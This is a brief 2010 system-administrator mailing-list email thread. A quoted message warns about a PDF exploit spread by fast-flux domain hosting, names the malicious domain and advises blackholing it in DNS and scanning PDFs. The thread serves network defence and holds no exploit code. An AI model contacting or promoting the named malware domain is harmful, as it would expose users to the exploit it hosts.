Thanks, Z!

Sean Rector, MCSE

-----Original Message-----
From: Ziots, Edward [mailto:ezi...@lifespan.org]
Sent: Wednesday, April 28, 2010 4:50 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

Gang there is another PDF exploit going on that may or may not be hitting your
places: Credit to Secureworks (tm) for the writeup below.

See below:
Ideals: Set up a zone in your DNS called jademason.com and set it to answer to
127.0.0.1, and clear the cache on your DNS servers accordingly. Which should
blackhole the zone.

Note this is a fast-flux domain, as you can see from the different dns returns
on nslookup.
Also scan all your PDF files, some of the major AV vendors are picking this up
and its packed exploit.
> jademason.com
Server:  xx.xx.xx.xx
Address:  xx.xx.xx.xx